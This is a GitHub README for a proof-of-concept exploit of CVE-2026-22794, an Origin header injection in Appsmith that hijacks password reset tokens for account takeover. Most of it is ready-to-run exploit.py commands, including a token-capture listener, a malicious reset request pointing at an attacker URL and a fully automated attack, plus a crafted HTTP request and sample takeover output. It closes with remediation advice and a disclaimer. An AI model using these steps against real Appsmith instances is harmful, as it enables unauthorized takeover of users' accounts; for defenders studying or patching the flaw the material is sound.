# CVE-2026-22794 - Appsmith Origin Header Injection

[![Python Version](https://img.shields.io/badge/python-3.7%2B-blue)](https://www.python.org/)
[![CVE](https://img.shields.io/badge/CVE-2026--22794-red)](https://cve.mitre.org/)
[![License](https://img.shields.io/badge/license-MIT-green)](LICENSE)

## 🔴 Critical Security Vulnerability

**Password Reset Link Hijacking via Origin Header Manipulation**

This repository contains a Proof of Concept (PoC) exploit for CVE-2026-22794, a critical vulnerability in Appsmith that allows attackers to hijack password reset tokens and achieve full account takeover.

## 📋 Vulnerability Summary

| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-22794 |
| **Affected Software** | Appsmith (versions prior to patch) |
| **Vulnerability Type** | Origin Header Injection |
| **Impact** | Full Account Takeover |
| **CVSS Score** | 9.1 (Critical) |
| **Attack Vector** | Network |
| **Attack Complexity** | Low |
| **Privileges Required** | None |
| **User Interaction** | Required (victim clicks link) |

## 🎯 Vulnerability Description

Appsmith uses the HTTP `Origin` header without validation to construct password reset and email verification URLs. The vulnerable code directly assigns the Origin header to the password reset base URL:

```java
userPasswordDTO.setBaseUrl(originHeader);
```

This allows an attacker to:
1. Trigger a password reset for any email address
2. Inject a malicious Origin header pointing to an attacker-controlled server
3. Capture the password reset token when the victim clicks the link
4. Use the token to reset the victim's password and take over their account

## 🔥 Attack Chain

```
┌─────────────────────────────────────────────────────────────────┐
│                     ATTACK FLOW                                  │
└─────────────────────────────────────────────────────────────────┘

  ┌──────────┐                    ┌──────────┐                    ┌──────────┐
  │ ATTACKER │                    │ APPSMITH │                    │  VICTIM  │
  └────┬─────┘                    └────┬─────┘                    └────┬─────┘
       │                               │                               │
       │ 1. POST /forgotPassword       │                               │
       │    Origin: attacker.com       │                               │
       │    email: victim@corp.com     │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │                               │ 2. Send email with            │
       │                               │    attacker.com/reset?token   │
       │                               │──────────────────────────────>│
       │                               │                               │
       │ 3. Victim clicks link         │                               │
       │<──────────────────────────────────────────────────────────────│
       │                               │                               │
       │ 4. Token captured!            │                               │
       │                               │                               │
       │ 5. POST /resetPassword        │                               │
       │    token: STOLEN_TOKEN        │                               │
       │    password: attacker123      │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │ 6. ACCOUNT TAKEOVER! ✓        │                               │
       │                               │                               │
```

## 📦 Installation

```bash
# Clone the repository
git clone https://github.com/MalikHamza7/CVE-2026-22794-POC
cd CVE-2026-22794-POC

# Install dependencies
pip install -r requirements.txt
```

## 🚀 Usage

### Check if target is vulnerable

```bash
python exploit.py --target https://appsmith.target.com --check
```

### Start token capture server

```bash
python exploit.py --listen --port 8080
```

### Send malicious password reset request

```bash
python exploit.py \
    --target https://appsmith.target.com \
    --email victim@company.com \
    --attacker-url https://your-server.com
```

### Full automated attack

```bash
python exploit.py \
    --target https://appsmith.target.com \
    --email victim@company.com \
    --attacker-url https://your-server.com \
    --listen --port 8080
```

### Use captured token to reset password

```bash
python exploit.py \
    --target https://appsmith.target.com \
    --reset-token CAPTURED_TOKEN \
    --new-password "NewP@ssw0rd!"
```

## 📸 Attack Demonstration

### Step 1: Attacker sends malicious request
```http
POST /api/v1/users/forgotPassword HTTP/1.1
Host: appsmith.target.com
Origin: https://attacker-server.com
Content-Type: application/json

{
  "email": "victim@company.com"
}
```

### Step 2: Victim receives email with malicious link
```
Password Reset Link: https://attacker-server.com/user/resetPassword?token=abc123xyz...
```

### Step 3: Attacker captures token
```
[+] INCOMING REQUEST CAPTURED!
[*] Path: /user/resetPassword?token=abc123xyz789...
[!!!] PASSWORD RESET TOKEN CAPTURED!
[!!!] Token: abc123xyz789...
```

### Step 4: Account takeover
```
[+] ACCOUNT TAKEOVER SUCCESSFUL!
[+] Password has been reset to: NewP@ssw0rd!
```

## 🛡️ Remediation

Organizations using Appsmith should:

1. **Update immediately** to the latest patched version
2. **Validate Origin headers** against a whitelist of allowed domains
3. **Use server-side configuration** for generating password reset URLs
4. **Implement additional verification** (e.g., IP validation, short token expiry)

### Secure Code Example

```java
// ❌ VULNERABLE CODE
userPasswordDTO.setBaseUrl(originHeader);

// ✅ SECURE CODE
String configuredBaseUrl = applicationConfiguration.getBaseUrl();
// Or validate against whitelist
if (!allowedOrigins.contains(originHeader)) {
    throw new InvalidOriginException("Invalid origin header");
}
userPasswordDTO.setBaseUrl(configuredBaseUrl);
```

## 📁 Repository Structure

```
CVE-2026-22794/
├── README.md           # This file
├── exploit.py          # Main exploit script
├── requirements.txt    # Python dependencies
├── LICENSE             # MIT License
└── docs/
    └── technical_analysis.md  # Detailed vulnerability analysis
```

## ⚠️ Legal Disclaimer

This tool is provided for **authorized security testing and educational purposes only**. 

- Only use this tool against systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal
- The author is not responsible for any misuse of this tool
- Always follow responsible disclosure practices

## 📄 References

- [CVE-2026-22794](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22794)
- [OWASP - Forgot Password Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html)
- [CWE-346: Origin Validation Error](https://cwe.mitre.org/data/definitions/346.html)

## 👤 Author

**Security Researcher**

- GitHub: [@MalikHamza7](https://github.com/MalikHamza7)
- LinkedIn: [Your LinkedIn Profile](https://www.linkedin.com/in/muhammad-hamza-iqbal-0b4413293/)

## 📜 License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

---

⭐ **If you found this useful, please star the repository!** ⭐
